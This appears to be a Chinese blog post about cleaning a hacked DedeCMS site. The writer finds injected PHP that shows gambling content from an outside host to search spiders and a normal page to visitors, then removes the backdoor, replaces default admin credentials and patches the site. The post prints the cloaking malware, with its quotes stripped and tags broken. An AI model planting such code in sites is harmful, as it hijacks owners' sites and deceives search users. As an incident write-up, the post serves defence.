前天 qq上收到一個(gè)朋友發(fā)來(lái)的消息，問(wèn)我在嗎，我一看是創(chuàng)業(yè)園時(shí)候的朋友，就聊了起來(lái)，他所在的公司的客戶(hù)的網(wǎng)站被入侵了
但是他和我說(shuō) 他的那個(gè)客戶(hù)的網(wǎng)站不是這類(lèi)的，和這個(gè)一點(diǎn)關(guān)系都沒(méi)有，我打開(kāi)了域名看到的實(shí)際內(nèi)容是
是一個(gè)商業(yè)網(wǎng)站，這時(shí)候我的思路很清晰了，首先可以確定的是人和蜘蛛看到的內(nèi)容不一樣，這也是常用黑帽手法，這樣可以獲取大量的外鏈，為了進(jìn)一步確認(rèn)的我思路，我決定用蜘蛛模擬器試試結(jié)果如下圖：
果然和我想的是一樣的，這就證明了我的猜想，這種一般就是在網(wǎng)站根目錄添加一個(gè)畸形文件，讓這個(gè)畸形文件無(wú)法刪除
并且優(yōu)先級(jí)要高于網(wǎng)站本身的權(quán)限，或者是在網(wǎng)站的默認(rèn)文件檔里面加上一段代碼，來(lái)調(diào)用他的文件，來(lái)判斷來(lái)的人還是蜘蛛
如果是蜘蛛就給它顯示博采的內(nèi)容，如果是人就顯示正常的頁(yè)面，在了ftp帳號(hào)密碼 進(jìn)行一步檢查，
發(fā)現(xiàn)用的是我的第二種手法， 在文件內(nèi)加入了以下php代碼
$file=http://www.aoxsys.net/seo/3.html;
$referer=$_server[http_referer];
$agent= strtolower($_server[http_user_agent]);
if(strstr($referer,baidu)&&strstr($referer,456))
{
header(location: $url);
}
if ( ereg( http://www.aoxsys.net/search/spider.htm,$agent ))
{
$content=file_get_contents($file);
echo $content;
exit;
}
>
< php
這個(gè)代碼明白的一看就知道了吧，我就不解釋了，在根目錄還發(fā)現(xiàn)一個(gè)加密的文件，那個(gè)文件貌似是博采的網(wǎng)頁(yè)內(nèi)容，命名為index.asp.asp 接下來(lái)就是替換index.php文件 然后刪除相關(guān)后門(mén)，打上補(bǔ)丁，
但是當(dāng)我拿到網(wǎng)站后臺(tái)的帳號(hào)密碼的時(shí)候我崩潰了，密碼竟然 是默認(rèn)的，帳號(hào)也是默認(rèn)的，程序是dede 存在安全漏洞
修補(bǔ)漏洞 用dede的安全檢測(cè)工具稍微檢查了一下木馬和webshell 沒(méi)有多余發(fā)現(xiàn)，打上補(bǔ)丁收工，再用蜘蛛模擬器查看
網(wǎng)站內(nèi)容和蜘蛛的爬行內(nèi)容一致了 接下來(lái)就是@蜘蛛了 讓蜘蛛過(guò)來(lái)爬 收錄并更新快照 什么怎么@蜘蛛嗎 這你都不會(huì)嗎
那我也不會(huì) 嘿嘿!
注：更多請(qǐng)關(guān)注建站教程欄目


企業(yè)品牌網(wǎng)站建設(shè)依舊是圍繞用戶(hù)需求來(lái)提升公司形象
什么是面包屑，面包屑導(dǎo)航對(duì)seo有哪些作用
網(wǎng)絡(luò)適配器是什么（有什么作用）
新品寶貝沒(méi)流量，怎么刷？
煙臺(tái)seo教你如何做網(wǎng)站推廣！
網(wǎng)站域名和空間要如何選擇?
公司企業(yè)百度負(fù)面信息處理思路與方法維護(hù)企業(yè)好形象
企業(yè)如何提升網(wǎng)站體驗(yàn)促進(jìn)關(guān)鍵詞優(yōu)化?